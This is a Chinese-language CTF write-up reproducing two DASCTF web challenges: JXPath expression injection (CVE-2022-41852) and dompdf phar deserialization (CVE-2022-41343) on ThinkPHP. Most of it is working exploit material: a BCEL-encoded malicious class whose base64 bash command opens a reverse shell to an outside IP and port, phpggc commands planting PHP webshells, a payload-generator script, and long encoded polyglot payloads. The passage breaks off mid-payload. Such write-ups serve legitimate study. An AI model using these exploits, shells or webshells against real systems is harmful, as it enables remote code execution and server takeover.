DASCTF-WEB-复现

ezjxpath

cve-2022-41852

这里看别的师傅的博客写的是TCTF中的非预期解

刚开始的时候,发现这是个CVE漏洞，但是google能搜到的方法他全给ban了，所以这个得自己去找利用链子来打

这里的话是给了一个不知道啥玩意的东西，然后把jar包下载下来进行查看

就是这里产生了漏洞利用点

网上能查到的payload

public static void main(String[] args) {
    try {
        JXPathContext context = JXPathContext.newContext(null);
        context.getValue("exec(java.lang.Runtime.getRuntime(), 'calc')");
    } catch (Exception e) {
        e.printStackTrace();
    }
}

public static void main(String[] args) {
    try {
        JXPathContext context = JXPathContext.newContext(null);
        context.getValue("org.springframework.context.support.ClassPathXmlApplicationContext.new(\"http://127.0.0.1:9000/spring-Evil.xml\")");
    } catch (Exception e) {
        e.printStackTrace();
    }
}

try {
        JXPathContext context = JXPathContext.newContext(null);
        context.getValue("javax.naming.InitialContext.doLookup('rmi://127.0.0.1:1099/1u560y')");
    } catch (Exception e) {
        e.printStackTrace();
    }

就是这常见的三种，但是都给ban掉了

于是我们就得自己去寻找链子来打了

如此一来我们只能另寻蹊跷了，赛后就突然想到TCTF里的非预期解好多都是静态方法，而这里我们也是用静态方法去利用的
com.sun.org.apache.bcel.internal.util.JavaWrapper，这个类的_main方法逻辑如下

这个类在rt.jar包里，

  public static void _main(String[] argv) throws Exception {
    /* Expects class name as first argument, other arguments are by-passed.
     */
    if(argv.length == 0) {
      System.out.println("Missing class name.");
      return;
    }

    String class_name = argv[0];
    String[] new_argv = new String[argv.length - 1];
    System.arraycopy(argv, 1, new_argv, 0, new_argv.length);

    JavaWrapper wrapper = new JavaWrapper();
    wrapper.runMain(class_name, new_argv);
  }
}

主要逻辑在于runMain方法里面，class_name和new_argv就是类名和参数，逻辑如下

public void runMain(String class_name, String[] argv) throws ClassNotFoundException
{
  Class   cl    = loader.loadClass(class_name);
  Method method = null;

  try {
    method = cl.getMethod("_main",  new Class[] { argv.getClass() });

    /* Method _main is sane ?
     */
    int   m = method.getModifiers();
    Class r = method.getReturnType();

    if(!(Modifier.isPublic(m) && Modifier.isStatic(m)) ||
       Modifier.isAbstract(m) || (r != Void.TYPE))
      throw new NoSuchMethodException();
  } catch(NoSuchMethodException no) {
    System.out.println("In class " + class_name +
                       ": public static void _main(String[] argv) is not defined");
    return;
  }

  try {
    method.invoke(null, new Object[] { argv });
  } catch(Exception ex) {
    ex.printStackTrace();
  }
}

loader.loadClass(class_name);处显然是有类加载的，而这个loader仔细一看会发现是一个BCEL

根据这道题在重新捡一下动态类加载 进行复习一下

这里的话考察的是 Java安全之BCEL ClassLoader

既然有这个东西，那么我们就写篇文章来学一下这个BCEL ClassLoader

然后对于上述的JavaWrapper类，最后loadclass后会去调用恶意类的_main方法，那我们只需要复刻一下恶意类就好了

下面的就是恶意类

package org.example;

import java.io.IOException;

public class calc {
    public static void _main(String[] argv) throws IOException {
        Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTE2LjExOS4yNTMvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}");
    }

    public static void main(String[] args) {

    }
}

随之把他编译为字节码

package org.example;

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;

import java.io.IOException;

/**
 * Hello world!
 *
 */
public class App
{
    public static void main( String[] args ) throws Exception {
        JavaClass javaClass = Repository.lookupClass(calc.class);
        String code = Utility.encode(javaClass.getBytes(), true);
        System.out.println("$$BCEL$$"+code);
        Class.forName("$$BCEL$$"+code,true,new ClassLoader());


}

最后打入

context.getValue("com.sun.org.apache.bcel.internal.util.JavaWrapper._main(split('$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmR$5dO$TA$U$3dC$b7$5d$ba$ae$C$c5$ef$_$aab$y$d2$ba$R$88$n$a91i$9ab4$db$WiS$82$3e$98$e92$d9N$d3$dd$r$bb$db$ba$80$fc$u_$d4$f8$e0$P$f0G$Z$ef$b4$84$Sa$92$993s$ee$99s$e7$de$cc$9f$bf$bf$7e$Dx$89$a7$G2$b8m$e0$O$ee$ce$e2$9e$c2$fb$3a$k$e8x$c8$90y$z$7d$Z$bfaH$VV$3a$MZ5$d8$X$Ms$b6$f4Ec$e8uE$d8$e6$dd$B19$3bp$f8$a0$c3C$a9$ce$a7$a4$W$f7d4$8e$85$ae$r$S$ee$j$M$84E2$a7$cc$90$fe$ecq$e93$dc$y$7c$b2$fb$7c$c4$ad$B$f7$5d$ab$V$87$d2w$cb$e3T$3ctG$M$8b$97$84$Z$8cZ$e2$88$83X$G$7e$a4c$89$c4$T3u$87$S$g$ad$60$Y$3abK$aaGdU$c2$X$ca$c3$84$8eY$jy$T$8f$f0$98$81wy$d4$cb$97$9c$fc$b1pzAq$cf$db$3a$e2$d5J$cc$5b$95$d5$f7$b22$fa$f8$b6$b3f$af$ef$f4$9d$eafRo$7f$Y$d6$db$b55$bb_K$9a$ad$8d$c3F$bb$3ej$i9$eb$8d$c3$ca$97m$b9$97$9c$7c$3d$s3$f1j$a3X$da$9f$ec$7b$c5$92$3c1$f1$E$cb$M$f3$ff$97O$d4$b4$a6f$b7$_$9c$98$K$jS2$b0$de5$cf$8acX$98$Kw$86$7e$y$3d$aa$c8pE$7cv$b8QX$b1$_h$a8C$9aH$E$rzV$b8$a4$bb$e7$a8$ed0pD$U$95$a9$ri$fa$Ej$a4$c0T$a3h$cd$d2$c9$od$84$e9$e7$3f$c0$be$d1f$G$G$ad$99$J$89$x$b4$9a$a7$7b$TW$J$b3$b8$869R$a9$cb$9b$84$wf$fc$c4L$$$f5$j$da$ee$d4$c1$m$E$r$caR$aa$a9$8b$81y$y$Q$e6hj$c4$yR$fc$3a$f9M$k$b3JS$a9$$$3c$c4$3cgA$3d$Z$5b$d0$df$g$abn$fd$D$f9$9fP$X$e8$C$A$A',','))");

这里用到的split来获取数组，因为_main只接受数组参数

在这里loadclass返回恶意类之后，然后调用了恶意类里的_main方法，然后就到题目的

context.getvalue()方法，这个方法会调用到invoke方法，然后进行命令执行。

pdf_converter_revenge

题目

查看给的源码发现这里存在一个路劲，然后发现了这个thinkphp版本，这里的非预期解是可以直接拿thinkphp v5.0.21的poc直接打

接下来讲一下预期解

考点：Phar反序列化

发现有一个依赖叫做dompdf

CVE-2022-41343 - 通过 Phar 反序列化的 RCE

这里的话根据版本号去google搜索漏洞的话，还是可以搜到一些漏洞分析文章的

DomPDF库反序列化RCE漏洞分析

这两篇文章都可以进行参考

漏洞点

<?php
public function registerFont($style, $remoteFile, $context = null)
{
    [...]
        $entry[$styleString] = $localFile;

        // Download the remote file
        [$protocol] = Helpers::explode_url($remoteFile);
        $allowed_protocols = $this->options->getAllowedProtocols();
        if (!array_key_exists($protocol, $allowed_protocols)) {
            Helpers::record_warnings(E_USER_WARNING, "Permission denied on $remoteFile. The communication protocol is not supported.", __FILE__, __LINE__);
        }

        foreach ($allowed_protocols[$protocol]["rules"] as $rule) {
            [$result, $message] = $rule($remoteFile);
            if ($result !== true) {
                Helpers::record_warnings(E_USER_WARNING, "Error loading $remoteFile: $message", __FILE__, __LINE__);
            }
        }

        list($remoteFileContent, $http_response_header) = @Helpers::getFileContent($remoteFile, $context);
        if ($remoteFileContent === null) {
            return false;
        }
    [...]
}

主要错误就在这一段，在if ($result !== true)后并没有return来结束，因此可以进入getFileContent函数，这意味着可以使用任何协议，然后包括主角phar

   public static function getFileContent($uri, $context = null, $offset = 0, $maxlen = null)
{
        $content = null;
        $headers = null;
        [$protocol] = Helpers::explode_url($uri);
        $is_local_path = in_array(strtolower($protocol), ["", "file://", "phar://"], true);
        $can_use_curl = in_array(strtolower($protocol), ["http://", "https://"], true);

        set_error_handler([self::class, 'record_warnings']);

        try {
            if ($is_local_path || ini_get('allow_url_fopen') || !$can_use_curl) {
                if ($is_local_path === false) {
                    $uri = Helpers::encodeURI($uri);
                }
                if (isset($maxlen)) {
                    $result = file_get_contents($uri, false, $context, $offset, $maxlen);
                } else {
                    $result = file_get_contents($uri, false, $context, $offset);
                }
                if ($result !== false) {
                    $content = $result;
                }
                if (isset($http_response_header)) {
                    $headers = $http_response_header;
                }

            } elseif ($can_use_curl && function_exists('curl_exec')) {
         [...]
            }
        } finally {
            restore_error_handler();
        }

        return [$content, $headers];
    }

[...]

这里就是触发phar反序列化的关键了

可以看到file_get_contents，之后就不赘述了，接下来解释一下复现步骤，由于题目是基于TP5的，那么肯定是可以打TP5的反序列化利用链。
首先我们要生成恶意字体文件，用以下脚本去生成：

脚本是上面的分析文章里写的

#!/usr/bin/env python3
import fontforge
import os
import sys
import tempfile
from typing import Optional

def main():
    sys.stdout.buffer.write(do_generate_font())

def do_generate_font() -> bytes:
    fd, fn = tempfile.mkstemp(suffix=".ttf")
    os.close(fd)
    font = fontforge.font()
    font.copyright = "DUMMY FONT"
    font.generate(fn)
    with open(fn, "rb") as f:
        res = f.read()
    os.unlink(fn)
    result = res
    return result

if __name__ == "__main__":
    main()

大概率会报错font模块没找到apt-get install python3-fontforge安装一下
之后可以生成可以font：

就是把python脚本生成的内容给到font.ttf里面

然后就开始使用phpggc来生成payload

PHPGGC是一款能够自动生成主流框架的序列化测试payload的工具,可以说是反序列化的武器库,平时遇到有关反序列化的题目时如果能够熟练运用它，将节省大量功夫

./phpggc -l 查看可利用的反序列化链

这里根据题目的thinkphp版本来进行选

./phpggc ThinkPHP/FW1 <remote_path> <local_path>
用法如上，remote_path是要写入靶场的位置，local_path是你shell文件的位置。
需要注意的是。tp5的话写入public文件夹下。因为只有public文件夹下我们可以访问
这里我准备的shell如下。

<?php eval($_POST[1]);?>

php -d phar.readonly=0 phpggc ThinkPHP/RCE2 system "echo '<?php system($_GET[0]); ?>' > /var/www/html/public/mochu7.php" -p phar -pp font.ttf -o font-polyglot.phar

然后用下面的脚本生成payload

#!/usr/bin/env python3
import argparse
import hashlib
import base64
import urllib.parse
import os

PAYLOAD_TEMPLATE_URL_ENCODED = '''
<style>@font-face+{+font-family:'exploit';+src:url('%s');+font-weight:'normal';+font-style:'normal';}</style>
'''
PAYLOAD_TEMPLATE = '''
<style>
    @font-face {
        font-family:'exploit';
        src:url('%s');
        font-weight:'normal';
        font-style:'normal';
    }
</style>
'''

def get_args():
    parser = argparse.ArgumentParser( prog="generate_payload.py",
                      formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
                      epilog= '''
                       This script will generate payloads for CVE-2022-41343
                      ''')
    parser.add_argument("file", help="Polyglot File")
    parser.add_argument("-p", "--path", default="/var/www/", help="Base path to vendor directory (Default = /var/www/)")
    args = parser.parse_args()
    return args

def main():
    args = get_args()
    file = args.file.strip()
    path = args.path.strip()
    if(os.path.exists(file)):
        generate_payloads(file, path)
    else:
        print("ERROR: File doesn't exist.")

def generate_payloads(file, path):
    with open(file, "rb") as f:
        fc = f.read()
    b64 = base64.b64encode(fc)
    data_uri_pure = "data:text/plain;base64,%s" % b64.decode()
    data_uri_double_encoded = "data:text/plain;base64,%s" % urllib.parse.quote_plus(urllib.parse.quote_plus(b64.decode()))
    md5 = hashlib.md5(urllib.parse.unquote(data_uri_double_encoded).encode()).hexdigest()
    # 计算md5这里，因为大佬这里是两次url编码，但是上传之后服务器接收会解一次url，dompdf真正处理的数据应该是经过一次url解码的数据，所以计算md5需要解一次url编码才是正确的文件名
    phar_uri = "phar://%s/vendor/dompdf/dompdf/lib/fonts/exploit_normal_%s.ttf##" % (path,md5)
    req1_enc = PAYLOAD_TEMPLATE_URL_ENCODED % data_uri_double_encoded
    req2_enc = PAYLOAD_TEMPLATE_URL_ENCODED % urllib.parse.quote_plus(phar_uri)
    req1_pure = PAYLOAD_TEMPLATE % data_uri_double_encoded
    req2_pure = PAYLOAD_TEMPLATE % phar_uri
    print("====== REQUEST 1 ENCODED =======")
    print(req1_enc)
    print("====== REQUEST 2 ENCODED =======")
    print(req2_enc)
    print("====== REQUEST 1 NOT ENCODED =======")
    print(req1_pure)
    print("====== REQUEST 2 NOT ENCODED =======")
    print(req2_pure)

if __name__ == "__main__":
    main()

python 1.py -p "/var/www/html" font-polyglot.phar

====== REQUEST 1 ENCODED =======

<style>@font-face+{+font-family:'exploit';+src:url('data:text/plain;base64,UHJvZ3JhbSByb290OiAvdXNyCldhcm5pbmc6IEZvbnQgY29udGFpbmVkIG5vIGdseXBocwrvv73vv706Y3Z0ICF5Z2FzcO%252B%252Fve%252B%252FvWdseWY977%252B977%252B9PmFwCiAgICAgICAgICAgICAgICAgICAgICAgVGhlYWQhRe%252B%252Fve%252B%252Fve%252B%252FvTZoaGVhICRobXR477%252B9Ie%252B%252FvQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvY2EqbWF4cEc5OCBuYW1l77%252B9IylGYO%252B%252FvXBvc3Tvv73vv70yRCLvv712Tl8877%252B9CiAgICAgICAg77%252B977%252B9bkvvv73vv71uS%252B%252B%252FvSEq77%252B9Wu%252B%252Fve%252B%252FvUAu77%252B977%252B977%252B977%252B977%252B977%252B977%252B977%252B9MVBmRWTvv73vv73vv70g77%252B9OFrvv70gbCFNNOKWku%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvSF5KioqISrvv70u77%252B9Lzzvv73vv70y77%252B977%252B9PO%252B%252Fve%252B%252FvTLvv70vPO%252B%252Fve%252B%252FvTLvv73vv70877%252B977%252B9MjMhJzMjISAgICAgIO%252B%252Fve%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvWYhWO%252B%252FvQogICAgICAgIDVPJe%252B%252FvSAgICDvv70gICAgICAgKyAgICAgICAgICAgICAgICEgICAgICAgPyAgICAgICBKVyAgICAgIO%252B%252FvSAgICAgICDvv70gICBEVU1NWSBGT05URFVNTVkgRk9OVFVudGl0bGVkMVVudGl0bGVkMVJlZ3VsYXJSZWd1bGFyRm9udEZvcmdlIDIuMCA6IFVudGl0bGVkMSA6IDI2LTQtMjAyM0ZvbnRGb3JnZSAyLjAgOiBVbnRpdGxlZDEgOiAyNi00LTIwMjNVbnRpdGxlZDFVbnRpdGxlZDFWZXJzaW9uIDAwMS4wMDBWZXJzaW9uIDAwMS4wMDBVbnRpdGxlZDFVbnRpdGxlZDHvv73vv70y77%252B977%252B977%252B977%252B977%252B9de%252B%252FvW5L77%252B977%252B9bkvvv70KPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8%252BDQpVCgAAAQAAABEAAAABAAAAAAAfCgAATzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NTp7czo5OiIAKgBhcHBlbmQiO2E6MTp7aTowO3M6ODoiZ2V0RXJyb3IiO31zOjg6IgAqAGVycm9yIjtPOjI3OiJ0aGlua1xtb2RlbFxyZWxhdGlvblxIYXNPbmUiOjM6e3M6MTU6IgAqAHNlbGZSZWxhdGlvbiI7YjowO3M6ODoiACoAcXVlcnkiO086MTQ6InRoaW5rXGRiXFF1ZXJ5IjoxOntzOjg6IgAqAG1vZGVsIjtPOjIwOiJ0aGlua1xjb25zb2xlXE91dHB1dCI6Mjp7czoyODoiAHRoaW5rXGNvbnNvbGVcT3V0cHV0AGhhbmRsZSI7TzozMDoidGhpbmtcc2Vzc2lvblxkcml2ZXJcTWVtY2FjaGVkIjoyOntzOjEwOiIAKgBoYW5kbGVyIjtPOjI3OiJ0aGlua1xjYWNoZVxkcml2ZXJcTWVtY2FjaGUiOjM6e3M6MTA6IgAqAG9wdGlvbnMiO2E6NTp7czo2OiJleHBpcmUiO2k6MDtzOjEyOiJjYWNoZV9zdWJkaXIiO2I6MDtzOjY6InByZWZpeCI7czowOiIiO3M6NDoicGF0aCI7czowOiIiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czoxMDoiACoAaGFuZGxlciI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mjp7czo2OiIAKgBnZXQiO2E6MTp7czoxODoiSEVYRU5TPGdldEF0dHI%252Bbm88IjtzOjU0OiJlY2hvICc8P3BocCBzeXN0ZW0oKTsgPz4nID4gL3Zhci93d3cvaHRtbC9wdWJsaWMvMS5waHAiO31zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO31zOjY6IgAqAHRhZyI7YjoxO31zOjk6IgAqAGNvbmZpZyI7YTo3OntzOjQ6Imhvc3QiO3M6OToiMTI3LjAuMC4xIjtzOjQ6InBvcnQiO2k6MTEyMTE7czo2OiJleHBpcmUiO2k6MzYwMDtzOjc6InRpbWVvdXQiO2k6MDtzOjEyOiJzZXNzaW9uX25hbWUiO3M6NjoiSEVYRU5TIjtzOjg6InVzZXJuYW1lIjtzOjA6IiI7czo4OiJwYXNzd29yZCI7czowOiIiO319czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX19czoxMToiACoAYmluZEF0dHIiO2E6Mjp7aTowO3M6Mjoibm8iO2k6MTtzOjM6IjEyMyI7fX1zOjk6IgAqAHBhcmVudCI7TzoyMDoidGhpbmtcY29uc29sZVxPdXRwdXQiOjI6e3M6Mjg6IgB0aGlua1xjb25zb2xlXE91dHB1dABoYW5kbGUiO086MzA6InRoaW5rXHNlc3Npb25cZHJpdmVyXE1lbWNhY2hlZCI6Mjp7czoxMDoiACoAaGFuZGxlciI7TzoyNzoidGhpbmtcY2FjaGVcZHJpdmVyXE1lbWNhY2hlIjozOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6MDoiIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6MTA6IgAqAGhhbmRsZXIiO086MTM6InRoaW5rXFJlcXVlc3QiOjI6e3M6NjoiACoAZ2V0IjthOjE6e3M6MTg6IkhFWEVOUzxnZXRBdHRyPm5vPCI7czo1NDoiZWNobyAnPD9waHAgc3lzdGVtKCk7ID8%252BJyA%252BIC92YXIvd3d3L2h0bWwvcHVibGljLzEucGhwIjt9czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjt9czo2OiIAKgB0YWciO2I6MTt9czo5OiIAKgBjb25maWciO2E6Nzp7czo0OiJob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo0OiJwb3J0IjtpOjExMjExO3M6NjoiZXhwaXJlIjtpOjM2MDA7czo3OiJ0aW1lb3V0IjtpOjA7czoxMjoic2Vzc2lvbl9uYW1lIjtzOjY6IkhFWEVOUyI7czo4OiJ1c2VybmFtZSI7czowOiIiO3M6ODoicGFzc3dvcmQiO3M6MDoiIjt9fXM6OToiACoAc3R5bGVzIjthOjE6e2k6MDtzOjc6ImdldEF0dHIiO319czoxNToiACoAc2VsZlJlbGF0aW9uIjtiOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjI6e3M6MTA6IgAqAGhhbmRsZXIiO086Mjc6InRoaW5rXGNhY2hlXGRyaXZlclxNZW1jYWNoZSI6Mzp7czoxMDoiACoAb3B0aW9ucyI7YTo1OntzOjY6ImV4cGlyZSI7aTowO3M6MTI6ImNhY2hlX3N1YmRpciI7YjowO3M6NjoicHJlZml4IjtzOjA6IiI7czo0OiJwYXRoIjtzOjA6IiI7czoxMzoiZGF0YV9jb21wcmVzcyI7YjowO31zOjEwOiIAKgBoYW5kbGVyIjtPOjEzOiJ0aGlua1xSZXF1ZXN0IjoyOntzOjY6IgAqAGdldCI7YToxOntzOjE4OiJIRVhFTlM8Z2V0QXR0cj5ubzwiO3M6NTQ6ImVjaG8gJzw%252FcGhwIHN5c3RlbSgpOyA%252FPicgPiAvdmFyL3d3dy9odG1sL3B1YmxpYy8xLnBocCI7fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7fXM6NjoiACoAdGFnIjtiOjE7fXM6OToiACoAY29uZmlnIjthOjc6e3M6NDoiaG9zdCI7czo5OiIxMjcuMC4wLjEiO3M6NDoicG9ydCI7aToxMTIxMTtzOjY6ImV4cGlyZSI7aTozNjAwO3M6NzoidGltZW91dCI7aTowO3M6MTI6InNlc3Npb25fbmFtZSI7czo2OiJIRVhFTlMiO3M6ODoidXNlcm5hbWUiO3M6MDoiIjtzOjg6InBhc3N3b3JkIjtzOjA6IiI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fX19fX0IAAAAdGVzdC50eHQEAAAAthRJZAQAAAAMfn%252FYpAEAAAAAAAB0ZXN022l2ia1yjzHI4j9%252F%252FNeso0pc1gcCAAAAR0JNQg%253D%253D');+font-weight:'normal';+font-style:'normal';}</style>

====== REQUEST 2 ENCODED =======

<style>@font-face+{+font-family:'exploit';+src:url('phar%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fvendor%2Fdompdf%2Fdompdf%2Flib%2Ffonts%2Fexploit_normal_da94a27b825aeca64e86b19a3972972d.ttf%23%23');+font-weight:'normal';+font-style:'normal';}</style>

====== REQUEST 1 NOT ENCODED =======

<style>
    @font-face {
        font-family:'exploit';
        src:url('data:text/plain;base64,UHJvZ3JhbSByb290OiAvdXNyCldhcm5pbmc6IEZvbnQgY29udGFpbmVkIG5vIGdseXBocwrvv73vv706Y3Z0ICF5Z2FzcO%252B%252Fve%252B%252FvWdseWY977%252B977%252B9PmFwCiAgICAgICAgICAgICAgICAgICAgICAgVGhlYWQhRe%252B%252Fve%252B%252Fve%252B%252FvTZoaGVhICRobXR477%252B9Ie%252B%252FvQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvY2EqbWF4cEc5OCBuYW1l77%252B9IylGYO%252B%252FvXBvc3Tvv73vv70yRCLvv712Tl8877%252B9CiAgICAgICAg77%252B977%252B9bkvvv73vv71uS%252B%252B%252FvSEq77%252B9Wu%252B%252Fve%252B%252FvUAu77%252B977%252B977%252B977%252B977%252B977%252B977%252B977%252B9MVBmRWTvv73vv73vv70g77%252B9OFrvv70gbCFNNOKWku%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvSF5KioqISrvv70u77%252B9Lzzvv73vv70y77%252B977%252B9PO%252B%252Fve%252B%252FvTLvv70vPO%252B%252Fve%252B%252FvTLvv73vv70877%252B977%252B9MjMhJzMjISAgICAgIO%252B%252Fve%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvWYhWO%252B%252FvQogICAgICAgIDVPJe%252B%252FvSAgICDvv70gICAgICAgKyAgICAgICAgICAgICAgICEgICAgICAgPyAgICAgICBKVyAgICAgIO%252B%252FvSAgICAgICDvv70gICBEVU1NWSBGT05URFVNTVkgRk9OVFVudGl0bGVkMVVudGl0bGVkMVJlZ3VsYXJSZWd1bGFyRm9udEZvcmdlIDIuMCA6IFVudGl0bGVkMSA6IDI2LTQtMjAyM0ZvbnRGb3JnZSAyLjAgOiBVbnRpdGxlZDEgOiAyNi00LTIwMjNVbnRpdGxlZDFVbnRpdGxlZDFWZXJzaW9uIDAwMS4wMDBWZXJzaW9uIDAwMS4wMDBVbnRpdGxlZDFVbnRpdGxlZDHvv73vv70y77%252B977%252B977%252B977%252B977%252B9de%252B%252FvW5L77%252B977%252B9bkvvv70KPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8%252BDQpVCgAAAQAAABEAAAABAAAAAAAfCgAATzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NTp7czo5OiIAKgBhcHBlbmQiO2E6MTp7aTowO3M6ODoiZ2V0RXJyb3IiO31zOjg6IgAqAGVycm9yIjtPOjI3OiJ0aGlua1xtb2RlbFxyZWxhdGlvblxIYXNPbmUiOjM6e3M6MTU6IgAqAHNlbGZSZWxhdGlvbiI7YjowO3M6ODoiACoAcXVlcnkiO086MTQ6InRoaW5rXGRiXFF1ZXJ5IjoxOntzOjg6IgAqAG1vZGVsIjtPOjIwOiJ0aGlua1xjb25zb2xlXE91dHB1dCI6Mjp7czoyODoiAHRoaW5rXGNvbnNvbGVcT3V0cHV0AGhhbmRsZSI7TzozMDoidGhpbmtcc2Vzc2lvblxkcml2ZXJcTWVtY2FjaGVkIjoyOntzOjEwOiIAKgBoYW5kbGVyIjtPOjI3OiJ0aGlua1xjYWNoZVxkcml2ZXJcTWVtY2FjaGUiOjM6e3M6MTA6IgAqAG9wdGlvbnMiO2E6NTp7czo2OiJleHBpcmUiO2k6MDtzOjEyOiJjYWNoZV9zdWJkaXIiO2I6MDtzOjY6InByZWZpeCI7czowOiIiO3M6NDoicGF0aCI7czowOiIiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czoxMDoiACoAaGFuZGxlciI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mjp7czo2OiIAKgBnZXQiO2E6MTp7czoxODoiSEVYRU5TPGdldEF0dHI%252Bbm88IjtzOjU0OiJlY2hvICc8P3BocCBzeXN0ZW0oKTsgPz4nID4gL3Zhci93d3cvaHRtbC9wdWJsaWMvMS5waHAiO31zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO31zOjY6IgAqAHRhZyI7YjoxO31zOjk6IgAqAGNvbmZpZyI7YTo3OntzOjQ6Imhvc3QiO3M6OToiMTI3LjAuMC4xIjtzOjQ6InBvcnQiO2k6MTEyMTE7czo2OiJleHBpcmUiO2k6MzYwMDtzOjc6InRpbWVvdXQiO2k6MDtzOjEyOiJzZXNzaW9uX25hbWUiO3M6NjoiSEVYRU5TIjtzOjg6InVzZXJuYW1lIjtzOjA6IiI7czo4OiJwYXNzd29yZCI7czowOiIiO319czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX19czoxMToiACoAYmluZEF0dHIiO2E6Mjp7aTowO3M6Mjoibm8iO2k6MTtzOjM6IjEyMyI7fX1zOjk6IgAqAHBhcmVudCI7TzoyMDoidGhpbmtcY29uc29sZVxPdXRwdXQiOjI6e3M6Mjg6IgB0aGlua1xjb25zb2xlXE91dHB1dABoYW5kbGUiO086MzA6InRoaW5rXHNlc3Npb25cZHJpdmVyXE1lbWNhY2hlZCI6Mjp7czoxMDoiACoAaGFuZGxlciI7TzoyNzoidGhpbmtcY2FjaGVcZHJpdmVyXE1lbWNhY2hlIjozOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6MDoiIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6MTA6IgAqAGhhbmRsZXIiO086MTM6InRoaW5rXFJlcXVlc3QiOjI6e3M6NjoiACoAZ2V0IjthOjE6e3M6MTg6IkhFWEVOUzxnZXRBdHRyPm5vPCI7czo1NDoiZWNobyAnPD9waHAgc3lzdGVtKCk7ID8%252BJyA%252BIC92YXIvd3d3L2h0bWwvcHVibGljLzEucGhwIjt9czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjt9czo2OiIAKgB0YWciO2I6MTt9czo5OiIAKgBjb25maWciO2E6Nzp7czo0OiJob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo0OiJwb3J0IjtpOjExMjExO3M6NjoiZXhwaXJlIjtpOjM2MDA7czo3OiJ0aW1lb3V0IjtpOjA7czoxMjoic2Vzc2lvbl9uYW1lIjtzOjY6IkhFWEVOUyI7czo4OiJ1c2VybmFtZSI7czowOiIiO3M6ODoicGFzc3dvcmQiO3M6MDoiIjt9fXM6OToiACoAc3R5bGVzIjthOjE6e2k6MDtzOjc6ImdldEF0dHIiO319czoxNToiACoAc2VsZlJlbGF0aW9uIjtiOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjI6e3M6MTA6IgAqAGhhbmRsZXIiO086Mjc6InRoaW5rXGNhY2hlXGRyaXZlclxNZW1jYWNoZSI6Mzp7czoxMDoiACoAb3B0aW9ucyI7YTo1OntzOjY6ImV4cGlyZSI7aTowO3M6MTI6ImNhY2hlX3N1YmRpciI7YjowO3M6NjoicHJlZml4IjtzOjA6IiI7czo0OiJwYXRoIjtzOjA6IiI7czoxMzoiZGF0YV9jb21wcmVzcyI7YjowO31zOjEwOiIAKgBoYW5kbGVyIjtPOjEzOiJ0aGlua1xSZXF1ZXN0IjoyOntzOjY6IgAqAGdldCI7YToxOntzOjE4OiJIRVhFTlM8Z2V0QXR0cj5ubzwiO3M6NTQ6ImVjaG8gJzw%252FcGhwIHN5c